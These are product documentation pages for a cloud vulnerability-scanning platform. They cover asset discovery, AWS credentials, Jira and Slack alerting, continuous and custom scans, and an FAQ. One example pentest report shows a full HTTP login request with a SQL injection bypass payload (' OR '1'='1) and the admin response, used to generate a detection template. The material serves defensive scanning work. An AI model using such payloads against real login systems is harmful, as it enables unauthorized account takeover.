* You can add up to 50,000 individual hosts or 50 root domains.
* Click the **Advanced** tab to manually update the Auto Discovery Settings, and select a schedule.
Select **Add Assets** to complete the configuration and get the Cloud Platform started on discovering your assets.
With a Cloud Integration or Assets including Auto Discovery, you are now set up to ensure that the assets you added are maintained and up to date for scanning.
## What's Next?
Now that you've defined the Assets you want to include on the Cloud Platform you can move on to building your scans to detect vulnerabilities.
* Review [scanning basics](/cloud/scanning/overview)
* Explore [continuous scanning](/cloud/examples/continuousscan)
* Set up [custom automation](/cloud/examples/customautomation)
# Add Assets from your Cloud
Add Cloud Assets with Asset Discovery to track new resources
## Summary
For many organizations it's challenging to keep track of new assets across your cloud infrastructure.
In this example, we will walk through setting up ProjectDiscovery Cloud Platform (PDCP) to add assets from a Cloud Service Provider (AWS) with asset discovery enabled,
to ensure that as your infrastructure changes, your attack surface scanning can remain up to date.
### What you'll do
In this walkthrough we're going to go step-by-step through the process and complete the following actions:
* Collecting the data you need from your Cloud Service Provider
* Adding those details to PDCP to bring in your assets from the Cloud Provider
For this example we're going to walk through collecting the details you need from Amazon Web Services. Stay tuned for details on the other Cloud Service Providers we support.
## Collect your AWS details
Make sure you have the appropriate access in AWS for gathering the requirements for this example. You will be creating and collecting your AWS Access Key and AWS Secret Key for the target resources.
### Prerequisites
* **Important note**: The identity (role) used to create the required AWS Key must have read-only access to the target resource(s)
* For information on creating AWS Keys - [refer to the AWS Managing Key documentation.](https://docs.aws.amazon.com/kms/latest/developerguide/create-keys.html)
* As a best practice, we recommend creating a new identity/role to use exclusively with ProjectDiscovery Cloud Platform.
* The AWS Session Token is not a mandatory requirement, however if your organization uses Session policies, these are typically implemented for more granular permission management.
* Refer to [AWS documentation on Session Policies.](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html#policies_session)
### Steps in AWS
In this example we're going to assume that you want to create a new user for PDCP to monitor a specific S3 bucket for assets to add for scanning.
1. Log in to your [AWS Management Console.](https://aws.amazon.com/console/)
2. Navigate to IAM (Identity and Access Management), and select **IAM** from the services menu.
3. Select **Users** from navigation and **Create User**.
* Provide the user with a name that will make it easy to identify in PDCP
* Enable access to the AWS Management Console (*Optional*)
4. **Assign permissions** to the new user.
* This user will require **read only access** to the resources that you need to scan.
* We recommend that you implement the AWS read-only policies that provide access to EC2, Route53, and S3. This ensures that new resources added to the target services will be available to PDCP asset discovery.
* For example, in S3 a read-only policy should be selected and applied (see the example policy after these steps).
* Specific permissions like `s3:Get*` and `s3:List*` ensure that as new resources are added to the target S3 bucket, they will be brought into ProjectDiscovery for inclusion in any scans you create.
5. From the view of the user you just created, navigate to the Security Credentials tab, scroll down to Access Keys and select **Create access key**.
6. Select **Third-party service** and accept the confirmation.
7. A new access key will be generated. **Save the Access Key ID and Secret Access Key in a safe place to add those details to PDCP.**
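For reference, a minimal read-only S3 policy along the lines described above might look like the following. This is illustrative only; scope the placeholder `your-bucket` resources to your actual bucket rather than granting wider access:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PDCPReadOnlyS3",
      "Effect": "Allow",
      "Action": ["s3:Get*", "s3:List*"],
      "Resource": ["arn:aws:s3:::your-bucket", "arn:aws:s3:::your-bucket/*"]
    }
  ]
}
```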
If you have specific requirements based on your organization's security policies we're happy to help. Reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
## Add your Assets
Now that you have collected the required information from AWS, you can provide these details in ProjectDiscovery Cloud Platform.
1. Navigate to the **Assets tab** and select **Connect Cloud Services**.
2. On the Connect Cloud Services tab, navigate to AWS and select **Connect**.
3. Complete the required details:
* Add the Connection Name
* Add the AWS Access Key
* Add the AWS Secret Key
* Optionally add the Session Token
4. Select **Verify** to complete the connection.
## What's Next?
After setting up a connection to Cloud Services use your newly imported assets to [create a scan](/cloud/scanning/createscans).
# Create Tickets for Jira
Create actionable follow up for exploitable vulnerabilities in Jira
## Summary
ProjectDiscovery Cloud Platform has provided you with comprehensive scan results on exploitable vulnerabilities - what's next? You want to get your team involved and have a more seamless pipeline between data visibility, discovery, and follow up.
For your organization this means getting important tasks into Jira!
In this example, we'll walk through setting up this important workflow for a brand new user. You will add assets, configure a Jira integration, and initiate a scan to create a ticket for your team to take action.
### What You'll Do
In this walkthrough we're going to go step-by-step to complete the following actions:
* Add Assets
* Configure Jira
* Configure ProjectDiscovery Cloud Platform for Jira ticketing
* Start a scan to test your new integration
### Prerequisites
To complete the integration you will need to have the correct permissions to access account details within Jira. Refer to [Atlassian's documentation](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/) for additional details.
If you are not a Jira administrator you may need your organization's Jira administrator for assistance in collecting these details.
**You will need the following:**
* Jira instance URL
* Jira Account ID
* Jira email
* Jira API Token
* Jira Project name
## Add Assets
For this example we're going to stick with the simplest path and add assets to your PDCP environment by uploading a .TXT file with the domains you want to include for scanning.
If you already have assets in ProjectDiscovery Cloud Platform, you can skip ahead to Connecting Jira. For other asset upload options check out the docs on [Adding Assets](/cloud/assets/adding-assets).
Navigate to the [Assets tab](https://cloud.projectdiscovery.io/assets) and select **Add New Assets**.
On the Scope tab, use the **Upload files** option to add your .TXT file of domains.
Select your preferred configuration options:
* Auto Discovery is enabled by default, toggle to disable if desired.
* If you choose to leave Auto Discovery enabled, select your desired frequency.
* Navigate to the Advanced tab to modify individual discovery settings for subdomains, open ports, etc.
Select **Add Assets** to complete the setup.
Once your assets are added, you will need to connect your ProjectDiscovery Cloud Platform to your Jira account.
If you have questions on Assets - check out the [Assets - FAQ](/cloud/assets/overview#faq).
## Connecting Jira
After adding your assets, you will need to connect your ProjectDiscovery Cloud Platform environment to Jira. There are two parts to this, the part you will need to complete in your Jira environment and the details you'll need to add to ProjectDiscovery Cloud Platform.
### Jira Setup
Logged in to Jira as an administrator, visit [this link](https://id.atlassian.com/manage-profile/products) to locate your Jira instance URL.
You can also [use the REST API](https://developer.atlassian.com/cloud/jira/platform/rest/v3/) to obtain these details.
*Note: The format for URLs in Jira will vary depending on your account type (Jira Cloud vs on-prem)*
Log in to your Jira account and locate the following information:
* Jira instance URL
* Jira Account ID
* Jira Project Name
*Note: To locate your Jira account ID, click your Profile menu in the upper-right, then select **Profile**. The segment of the URL after /people/ is your account ID.*
**Save this information in a safe place.**
* Logged in as a Jira administrator, navigate to [https://id.atlassian.com/manage-profile/security/api-tokens](https://id.atlassian.com/manage-profile/security/api-tokens).
* Click **Create API token**.
* In the dialog that appears, enter a memorable label for your token and click **Create**.
* Click **Copy to clipboard**, and save this information in a safe place.
Next up, you will be adding these details from Jira to your environment in ProjectDiscovery Cloud Platform!
### ProjectDiscovery Cloud Platform Setup
Before getting started with this part of the setup ensure that you have completed the configuration required in Jira.
Navigate to **Scans → Configurations** and, under Ticketing, select **Connect** on the option for Jira.
In PDCP complete the information for Jira including:
* A name for your Jira Configuration
* Jira instance URL
* Jira account ID
* Jira Email
* Jira API Token
* *(Optional) Select Enable for all scans option if desired (you can also select this option during scan creation)*
* Select **Next** to continue the Jira integration setup.
* Provide the **Jira Project name** for the project in which you want to create issues from ProjectDiscovery Cloud Platform.
* Provide the **Jira Issue type** you want to have created.
* Add the Closed status. (Default is "Done" but this field can be edited)
* Choose your preferred options (toggle) for **Severity** and **Deduplication**.
* Add any Custom field details you want to include.
* Refer to [an example on custom fields from ProjectDiscovery](/tools/nuclei/running#nuclei-reporting) (*scroll to Jira*)
* Review Atlassian's documentation on [creating custom fields](https://support.atlassian.com/jira-cloud-administration/docs/create-a-custom-field/), or [locating existing custom field IDs](https://confluence.atlassian.com/jirakb/how-to-find-any-custom-field-s-ids-744522503.html).
Once you're satisfied with your configuration select **Verify** to complete your Jira integration.
Now that your configuration is set up, you can create a scan and verify your Jira integration.
## Create a Scan
The final step is to create a scan, verify that your Jira integration is set up correctly, and check for the corresponding ticket in the Jira project you configured.
From the Scans tab select **Create New Scan** to open the creation workflow.
* Select from the Assets we added in the first step.
* Choose the templates or template profile you want to use for scanning. *For this example we suggest keeping the Recommended template profile.*
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Check your Jira project to verify that your alert is working as expected!
## What's Next?
This example focuses on the process of integrating with Jira to create tickets for your team based on scan results.
ProjectDiscovery Cloud Platform also supports alerting workflows for Slack, MS Teams, email, and custom webhooks.
Check out another example that sets up a workflow to create a scan and [sends out a Slack alert.](/cloud/examples/slackalert)
# Continuous Scanning
Protect your attack surface by enabling a continuous vulnerability scan
## Summary
PDCP scanning focuses on providing speed and accuracy around the vulnerabilities we identify. We want to ensure that your results are not filled with noise, and to help you focus on the exploitable vulnerabilities that reflect the greatest risk.
To set up continuous scanning you will need:
* The assets you care about. Check out our [What is exposed?](/cloud/examples/addassets) use case to add your assets.
* A scan schedule to check for recent changes that may reflect new vulnerabilities.
* Notifications to your preferred channels (Ticketing or Alerts!) *By default, these alerts are sent to email.*
* Check out the [Scan Integrations](/cloud/scanning/integrations) for details.
With these things configured, the Cloud Platform can continuously run scans for you to keep your environment protected.
## Create a Continuous Scan
Follow the steps below to create a new continuous scan.
*Note: To include an alert or ticket creation as part of the scan you will need to
have configured an integration. You can add an integration during the scan setup below or update an existing scan to add the integration.*
Navigate to [https://cloud.projectdiscovery.io/scans](https://cloud.projectdiscovery.io/scans) and select **Create New Scan** to open the scan creation workflow.
Select (or add) the assets you want to include in your scheduled scan.
Click **Next** and select the templates you want to use for this scan.
Give the scan a name and select your scan frequency to configure how often you want this scan to run.
* *You have to set up a schedule to enable a continuous scan.*
Select **Integrate** to choose an existing Integration, or configure the new integration you want to use with this scan.
* *You can also update this scan after it is created to add the Integration.*
## What's Next?
Once your scan has completed successfully the scan results will be available on the main **Results** tab as part of your full results.
Select the individual scan you just created from the **Scans** page to see the results for the individual scan.
Explore these results to learn more about any vulnerabilities we identified and the details around the timing, templates, severity and more.
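If you prefer to pull these results programmatically, this reference documents a `GET /v1/scans/results` endpoint. A minimal Python sketch (the base URL and response shape are assumptions; verify against the API reference):

```python
import os

import requests

BASE_URL = "https://api.projectdiscovery.io"  # assumed base URL
headers = {"X-Api-Key": os.environ["PDCP_API_KEY"]}

# GET /v1/scans/results returns scan results for the authenticated user.
resp = requests.get(f"{BASE_URL}/v1/scans/results", headers=headers)
resp.raise_for_status()
for result in resp.json().get("results", []):  # response shape is an assumption
    print(result)
```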
# Custom vulnerability automation
Incorporate your internal reports to build custom automation
## Summary
Every organization is unique in its tech stack composition. You need to detect and remediate a whole range of vulnerabilities that are not just limited to publicly known attacks.
Our Cloud platform can automate scanning for almost any kind of vulnerability, including those you know about internally, across your environments.
Review this use case to walk through an example to create a template for custom automation.
## Custom automation
Imagine your penetration testing team found a critical vulnerability on `app.hooli.com`. Now, you want to look for this vulnerability on your other instances, or ensure it does not reappear on the same app in the future:
### Example
```
SQL Injection vulnerability in app.hooli.com/login. This vulnerability can potentially allow an attacker to bypass our authorization system and gain access to any given user account. This is a very critical vulnerability that needs to be patched.
HTTP Request:
POST /login HTTP/1.1
Host: app.hooli.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

username=admin&password=' OR '1'='1
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
```
### Create a Custom Template
Follow the steps below to build a custom template and automation.
Navigate to [https://cloud.projectdiscovery.io/templates](https://cloud.projectdiscovery.io/templates) and select **Start with AI** to open the workflow.
Paste your vulnerability report and click **Generate** to build a new custom template.
* This will take a moment to create a new template.
* *Use the example above to test this functionality out.*
Our template language is easy and versatile, allowing you to write nearly any type of vulnerability test.
* To make additional edits check out our [templates doc](/templates/introduction) to learn more.
Navigate to [https://cloud.projectdiscovery.io/scans](https://cloud.projectdiscovery.io/scans) and select **Create New Scan** to open the workflow to create a new scan using the template
you just created.
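The same flow can also be scripted through the `POST /v1/template/ai` endpoint documented in this reference. Here is a sketch, assuming the base URL below and a JSON body with a `prompt` field (both assumptions; confirm the exact schema in the API reference):

```python
import os

import requests

BASE_URL = "https://api.projectdiscovery.io"  # assumed base URL
headers = {"X-Api-Key": os.environ["PDCP_API_KEY"]}

# Assumption: the AI endpoint accepts the vulnerability report as a "prompt" field.
with open("internal-report.txt") as f:  # e.g. the example report above (hypothetical file)
    payload = {"prompt": f.read()}

resp = requests.post(f"{BASE_URL}/v1/template/ai", headers=headers, json=payload)
resp.raise_for_status()
print(resp.json())  # generated template details; response shape is an assumption
```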
## What's Next?
This workflow can quickly turn your internal vulnerability knowledge into continuous scans.
Monitor across your tech stack to identify similar matches and catch reappearances after implementing fixes.
Through these customizations you can easily build a security monitoring system that expands upon the expertise and data of your security teams.
* Review [scanning basics](/cloud/scanning/overview)
* Explore [continuous scanning](/cloud/examples/continuousscan)
* Check for a [trending vulnerability](/cloud/examples/trending)
# Generate Alerts in Slack
Keep your team informed of important vulnerabilities in Slack
## Summary
One of the most common security workflows focuses on making sure your team has visibility into potential exploits. Discovering an exploitable vulnerability is only one part of the process.
The next critical step is to alert your team so they can take action to triage and work towards remediation.
In this example, we'll walk through setting up ProjectDiscovery Cloud Platform (PDCP) to establish this important workflow to ensure that your team can act on any information the scan reveals to defend your infrastructure.
## What You'll Do
In this walkthrough we're going to go step-by-step through the entire process and complete the following actions:
* Add Assets
* Configure Slack
* Configure ProjectDiscovery Cloud Platform for Slack alerts
* Start a scan to test your new alert
## Add your Assets
For this example we're going to stick with the simplest path and add assets to your PDCP environment by uploading a .TXT file with the domains you want to include for scanning.
If you already have assets in ProjectDiscovery Cloud Platform, you can skip ahead to Connecting Slack. For other asset upload options check out the docs on [Adding Assets](/cloud/assets/adding-assets).
Navigate to the [Assets tab](https://cloud.projectdiscovery.io/assets) and select **Add New Assets**.
On the Scope tab, use the **Upload files** option to add your .TXT file of domains.
Select your preferred configuration options:
* Auto Discovery is enabled by default, toggle to disable if desired.
* If you choose to leave Auto Discovery enabled, select your desired frequency.
* Navigate to the Advanced tab to modify individual discovery settings for subdomains, open ports, etc.
Select **Add Assets** to complete the setup.
Next, you will need to connect your ProjectDiscovery Cloud Platform to the Slack channel where you want to receive alerts.
## Connecting Slack
After adding your assets, you will need to connect your ProjectDiscovery Cloud Platform environment to your Slack.
There are two parts to this, configuring your Slack environment, and configuring ProjectDiscovery Cloud Platform with your Slack details.
### Slack Setup
Need help? Refer to [Slack's documentation](https://api.slack.com/messaging/webhooks) on webhooks for additional details.
From your Slack environment, use [this link](https://api.slack.com/messaging/webhooks) to open the steps for creating an incoming webhook.
Under step 1, **Create a Slack app**, click the **Create your Slack app** button
* Choose **From Scratch**
* Provide your Slack App with a Name
* Pick your workspace
* Select **Create app**
Under **Building Apps for Slack**, select the **Incoming Webhooks** option.
Toggle the option to **Activate Incoming Webhooks** and once enabled select the **Add New Webhook to Workspace** option.
* Select a channel to configure for the Webhook integration.
* Once you've identified a channel, Slack sends a test message to let you know there is a new integration.
Copy the **Webhook URL** you generated and save this information to add to your ProjectDiscovery Cloud Platform integration settings.
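Optionally, you can confirm the webhook works before configuring PDCP by posting a test message to it from your terminal (the URL below is a placeholder; substitute the one you just generated):

```bash
# Send a test message to the Slack incoming webhook
curl -X POST -H 'Content-type: application/json' \
  --data '{"text": "PDCP alert test"}' \
  https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXX
```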
### PDCP Setup for Slack
*Before getting started with this part of the setup ensure that you have completed the configuration required in Slack and have your Webhook URL and Username details available.*
Navigate to **Scans → Configurations**. Select Alerting and then **Connect** under the option for Slack.
* Provide a name for your Slack configuration
* Provide the webhook you created in Slack for PDCP
* Provide a username for your Slack configuration (*Optional*)
Select the Events that you want to trigger notifications from ProjectDiscovery Cloud Platform to your Slack channel.
Select **Verify** to finalize your configuration.
Now that your configuration is set up, create a scan and verify your alert in Slack.
## Create a Scan with Alert
The final step is to create a scan, verify that your Slack integration is set up correctly, and check for the alert to the Slack channel you configured.
From the Scans tab select **Create New Scan** to open the creation workflow.
* Select from the Assets we added in the first step.
* Choose the templates or template profile you want to use for scanning. *For this example we suggest keeping the Recommended template profile.*
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Check your Slack channel to verify that your alert is working as expected!
## What's Next?
This example walks through integrating with Slack to alert your team about Scans. If you're interested in other options ProjectDiscovery Cloud Platform also supports alert workflows for Microsoft Teams, Email, and custom webhooks.
For even more integrations, check out our other Use Cases.
# Defend against trending vulnerabilities
Take action when you learn about popular attacks.
## Summary
When you hear about [a popular attack](https://techcrunch.com/2024/02/26/researchers-say-easy-to-exploit-security-bugs-in-connectwise-remote-access-software-now-under-mass-attack/) on the news
you obviously want to see if your organization is at risk for the vulnerability.
In this example you will quickly set up a scan to search across your infrastructure for a trending vulnerability.
## Scan for a vulnerability
Navigate to [https://cloud.projectdiscovery.io/templates](https://cloud.projectdiscovery.io/templates). Click on the sidebar to expand the view and search for the trending vulnerability `CVE-2024-1709`.
Your search found the [appropriate template](https://cloud.projectdiscovery.io/public/CVE-2024-1709). Open it to view the template details under **Target**.
Click on **Target list** and then **Add more** to choose the assets you want to scan.
* Add new assets, select existing assets, or use the assets you added in the [earlier example.](/cloud/examples/addassets)
Click **Scan now** to initiate a new scan.
* *You can also **Update** this scan after it's created to modify the schedule or add an Integration.*
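If you prefer the command line, the same check can also be run locally with open-source Nuclei. A minimal sketch, assuming Nuclei is installed and `targets.txt` lists hosts you are authorized to scan:

```bash
# Run only the CVE-2024-1709 template against a list of targets;
# add -cloud-upload to share the results with PDCP
nuclei -id CVE-2024-1709 -list targets.txt -cloud-upload
```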
## What's Next?
Once your scan has completed, review the details under the main **Results** tab as part of your total system results, or
select the individual scan to explore the specific scan and learn if your environment is impacted by this trending vulnerability!
As a next step you could:
* Update the scan to recur on a weekly basis
* Export those results to share with your organization
* Add a notification to your scan to alert your team on Slack or Microsoft Teams
# Vulnerability Regressions
Continuously retest vulnerabilities and detect similar issues across your infrastructure.
## Summary
As organizations uncover more vulnerabilities than ever before, managing and remediating critical security vulnerabilities becomes increasingly complex. Traditional workflows often involve fragmented tools and processes, making it challenging to ensure vulnerabilities are effectively resolved and do not reappear.
Recognizing these challenges, we have added a powerful feature to our cloud platform (currently in BETA): Vulnerability Regression with Nuclei.
This feature seamlessly integrates with your preferred ticketing solutions—GitHub, GitLab, Linear, and Jira—to streamline vulnerability management. By automatically generating Nuclei templates from reported vulnerabilities and continuously retesting during the remediation process, it ensures that security issues are effectively fixed.
### How It Helps
* **Automates Template Creation**: Transforms reported vulnerabilities into actionable Nuclei templates using AI, saving time and reducing manual effort with the ability to quickly edit the attached templates.
* **Continuous Retesting**: Automatically retests vulnerabilities when developers attempt to close issues, ensuring fixes are properly applied, and includes continuous monitoring of previously fixed vulnerabilities to file a ticket as soon as they reappear in production.
* **Infrastructure-wide Detection**: Identifies similar vulnerabilities across all assets, preventing overlooked threats and reducing the risk of reoccurrence.
### Request a Demo
[Contact us](https://projectdiscovery.io/request-demo) to request a personalized demo.
Learn how ProjectDiscovery can help your team save time, improve remediation efficiency, and strengthen your organization's security posture for critical vulnerabilities.
# Key Benefits
Learn more about the key benefits of using ProjectDiscovery Cloud Platform
## What are ProjectDiscovery Cloud Platform's key benefits?
With a portfolio of so many popular and successful open source tools, our prospects and users often ask about the key benefits of using ProjectDiscovery Cloud Platform. Explore some of the main benefits and advantages of PDCP below.
### Faster, Cloud-hosted Scans
As a cloud-hosted offering, PDCP abstracts away the complexities of running Nuclei and other ProjectDiscovery open source tools at scale.
Our cloud scanning engine is **50x faster than Nuclei**, completing scans of up to 20,000 targets in less than an hour.
This delivers scan results significantly faster and saves teams meaningful time that would otherwise be spent on maintaining infrastructure, writing custom scripts, and waiting for scan results to complete.
### Collaboration
Security is a team effort and open source tools can make it difficult to collaborate with teammates. ProjectDiscovery Cloud Platform provides users with a shared workspace to run vulnerability scans, view results, and triage findings. PDCP also includes role-based access control so security teams can invite engineers and other stakeholders to the platform in view-only roles.
### Tons of Automation
ProjectDiscovery Cloud Platform was designed to automate the key workflows of the modern security team. Asset discovery and reconnaissance have been simplified from chaining multiple open source tools into one simple step. Automatically scan for newly released Nuclei templates, or set up regression tests for fixed vulnerabilities. Schedule daily discovery and scans, or set up custom schedules, continuous scanning, or workflow-based scans. Key actions like copying cURL requests, opening vulnerable targets in a new tab, and initiating retests are all exposed to the user, saving multiple clicks and navigation between different applications.
### Powerful Integrations
ProjectDiscovery Cloud Platform makes it easy to connect your key services and applications. PDCP supports integrations to your favorite messaging apps like Slack to be alerted of critical findings, ticketing systems like Jira to automate the remediation process and initiate retests, and cloud providers to pull in your live hosts for scanning. We also have a fully functional [API](https://docs.projectdiscovery.io/api-reference/introduction) to customize any integrations in your organization.
### Dashboards and Executive Reporting
Showcase your security initiatives to leadership with beautiful dashboards and executive reports. Export vulnerability findings via PDF, JSON, or CSV. Leverage our real-time vulnerability scans to automatically scan your infrastructure for trending exploits and share findings proactively with your company.
### Support
Direct access to the ProjectDiscovery team for support on optimal configurations, writing advanced custom templates, and anything else you need to ensure ProjectDiscovery Cloud Platform meets your security needs.
# PDCP FAQ
Frequently Asked Questions about ProjectDiscovery Cloud Platform
Sign up for [ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/)
## Summary
Check out the Frequently Asked Questions on this page to learn about general usage for ProjectDiscovery Cloud Platform (PDCP). We cover topics around data, system settings and administration, and pricing info.
### Other FAQs
Are you looking for details about certain features? Check out our feature-specific FAQs for additional details.
* [Assets FAQ](/cloud/assets/overview#faq)
* [Scanning FAQ](/cloud/scanning/overview#faq)
* [Nuclei Templates FAQ](/cloud/editor/faq)
Have a question about the product that you don't see covered here? We want to know!
Contact [support@projectdiscovery.io](mailto:support@projectdiscovery.io) with any recommendations or issues.
## General
You can find our [terms of use](https://projectdiscovery.io/terms) here.
Our Cloud Platform is engineered for security and DevOps teams. Please include scan headers, whitelist your scan activities with your IT team, and limit scanning to authorized assets.
If you have questions, don't hesitate to reach out - [support@projectdiscovery.io](mailto:support@projectdiscovery.io)!
*Note: Unauthorized scans that lead to abuse reports will result in account suspension.*
ProjectDiscovery Cloud Platform works best on chromium-based browsers.
For questions about ProjectDiscovery Cloud Platform, we first recommend exploring our documentation. You can trigger our AI-based search with a question or phrase.
If you can't find what you need here - [email us](mailto:support@projectdiscovery.io), we're here to help!
Yes, with a Pro subscription you can have up to 10 team members. If you need support for a larger team, [get in touch](mailto:sales@projectdiscovery.io) and we'll be happy to talk about a custom setup.
ProjectDiscovery treats all vulnerability data and custom templates as private customer data. We do not share or sell this data and maintain strict protocols internally to limit access to your data.
This also applies to any information entered into our [AI template editor](/cloud/editor/overview). We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
ProjectDiscovery Cloud Platform data resides with our cloud infrastructure partners. We maintain several relationships with leading global cloud providers.
We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
We are working on an on-prem version of our Cloud Platform. Get in touch with us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io) to share more about your requirements and learn about our product roadmap for upcoming features.
## Pricing
Our Pro plan enables users to scan up to 1,000 unique assets per month. If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
A unique asset is a combination of host (subdomain or IP) and port; for example, `example.com:443` and `example.com:8080` count as two unique assets. Once scanned, you can rescan any asset again without extra cost for the rest of the month.
Once you reach your limit, you will not be able to scan additional unique assets until your limits reset at the start of the next billing month.
You will be notified prior to running a scan if your scan exceeds the remaining count of unique assets in your billing month. You will have the option of proceeding with that scan and we will scan as many new unique assets as possible up to your limit.
You can also reconfigure your scan with fewer assets by applying filters to an asset group and clicking “Start Vulnerability Scan”, or by deleting assets from an asset group: scroll to the right, click the kebab menu, and select “Delete”.
If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
For new users, visit [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) to sign up.
For existing users, visit **Settings –> Billing** to set up your subscription.
Changes to subscriptions are available in the Billing section of the Settings
page. If you are the team owner, you will also be able to view past invoices
under the Billing section of the Settings page.
You can cancel in the Billing section of the Settings page at any time.
Unfortunately, we do not offer full or partial refunds. If you have issues or
questions, contact
[support@projectdiscovery.io](mailto:support@projectdiscovery.io) and we will
do our best to help you out.
Our primary payment method is via credit card invoiced in USD. For ACH payments or other custom payment requirements, please reach out to [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
# Introducing ProjectDiscovery Cloud Platform
Sign up for [ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/)
## What is ProjectDiscovery Cloud Platform?
[ProjectDiscovery Cloud Platform (PDCP)](https://cloud.projectdiscovery.io) is a cloud-hosted security platform engineered to detect exploitable vulnerabilities and misconfigurations across your internal and external infrastructure at scale with zero false positives.\
Powered by a global open-source community of over 100,000 security professionals, PDCP is built with our most popular tools like Nuclei to bring next-generation reconnaissance, vulnerability detection, and remediation automation to the modern security team.
If you're new to ProjectDiscovery:
* Get started with a [free PDCP account](https://cloud.projectdiscovery.io)
* Learn about the [key benefits](/cloud/features) of Cloud
* New to Nuclei? Check out a hands-on example of [our popular open source tool Nuclei](/getstarted-overview)
* Explore more of our [open source tools](/tools/index)
## How are we different?
The security space is crowded with tools. Attack surface management, vulnerability management, exploit monitoring - what solutions do you need?
As concerns around security rise, organizations are increasingly shifting their attention to managing these risks.
Let's get into the details and learn more about *why* ProjectDiscovery Cloud Platform is different.
### Zero noise
Eliminate false positives with our modern vulnerability scanning engine, powered by Nuclei and [Nuclei templates](https://github.com/projectdiscovery/nuclei-templates).
Each template replicates the specific actions a hacker would take to validate an exploit with clear matcher logic.
This stands in contrast to traditional scanners that often rely on **version-based** checks that frequently generate false positives.
Our accuracy saves security teams hours of wasted triaging effort and enables teams to focus their efforts on remediating the vulnerabilities that matter.
### More Transparency
Nuclei templates offer clear visibility into how vulnerabilities are detected with logical matchers and easy-to-follow YAML syntax. These templates carry comprehensive information about each vulnerability including descriptions, severity, reference links, and remediation steps. PDCP also comes with fast and easy workflows to retest findings or replicate results. Learn more about our [Nuclei templates](https://docs.projectdiscovery.io/templates/introduction).
### Full Customization
No two organizations are identical, and neither are their security needs. Modern security teams need full control over their scanning workflows to get the most out of their vulnerability management program. PDCP provides users with the flexibility and customization to decide what assets to scan and which Nuclei templates to run, including custom schedules, headers, and even alerting and ticketing automation.
### Community Powered
Unlike traditional proprietary security companies, ProjectDiscovery began as an open-source company and today we leverage the expertise of over 100,000 security professionals worldwide to build great security tooling. When a new CVE like Log4J emerges, community contributions to our Nuclei Templates project are often available [within hours of a public proof of concept (PoC)](https://blog.projectdiscovery.io/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
PDCP's Nuclei template detection library today includes over 9,000 templates contributed by our community, every single one of which is reviewed by our internal team for quality and accuracy.
As one ProjectDiscovery customer puts it, “When we work with ProjectDiscovery, we work with the best hackers in the world.”
### A Detection Platform for All Security Risks
Not all security risks are publicly documented CVEs found in the National Vulnerability Database (NVD). In addition to covering the most common CVEs and misconfigurations, our Nuclei templates also detect exposed panels, default logins, leaked credentials, and many other security risks. Also, with our [AI Template Editor](https://docs.projectdiscovery.io/cloud/editor/ai), you can easily generate custom Nuclei templates to convert bug bounty reports, internal pentest findings, and other vulnerabilities into automatable security checks to run regularly against your infrastructure. Read about how [if you’re not writing custom Nuclei templates, you’re missing out](https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/).
### Powerful Reconnaissance
Vulnerability results are only as good as the scope of the vulnerability scan. PDCP's asset discovery and reconnaissance workflow leverages more than six open source tools to provide comprehensive enumeration of your external perimeter. Try our discovery capabilities by entering your domain [here](https://projectdiscovery.io).
### Enterprise Integrations and Capabilities
ProjectDiscovery Cloud Platform includes a host of enterprise capabilities and integrations to automate your workflows within your organization. Our integrations include 2-way ticketing sync to initiate retests from your ticketing platform of choice, alerting in your favorite messaging app like Slack or via email, and connections to your cloud providers to import current hosts for scanning. PDCP also enables users to whitelist scan traffic by IP, enforce rate limiting, scan internal CI/CD pipelines, export executive reports on findings and risk posture, and meet compliance frameworks like SOC 2, PCI, and HIPAA. We also include enterprise features like SSO/SAML, role-based access control, and audit logs in our platform.
# Scans and vulnerabilities
A high-level user guide for creating a scan and reviewing vulnerabilities
Scans are at the heart of the ProjectDiscovery Cloud Platform (PDCP).
After [adding assets](/cloud/assets/adding-assets), select the templates you want to use, and complete the scan details to start checking your tech stack for exploitable vulnerabilities.
On Scans, the three sections (sub-tabs) are Scans, Results, and Configurations.
* **Scans** - view all of the scans you or your team created.
* **Results** - a summary of all scan results in a unified view.
* **Configurations** - explore integrations for alerting and ticketing, scan settings, and template options. (Check out the [Integrations page](/cloud/scanning/integrations) for details.)
## Scans
The Scans tab provides a summary of your scan data and displays a list of all of your created scans. These results can be explored using search and filtering.
The Scans section also includes the **Create Scan** and **Connect to local Nuclei** options.
For examples of common scanning workflows check out our [Use Cases.](/cloud/usecases)
### Creating a Scan
From the Scans tab select **Create New Scan** to open the creation workflow.
For advanced scan configurations, check out [Integrations](/cloud/scanning/integrations) we support for Jira, Slack, and more.
Select from existing Assets or add new assets.
Choose the templates you want to use for scanning.
* Template Profiles (groups of templates for a specific category)
* Custom Templates (from the full Nuclei template library or any custom templates)
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
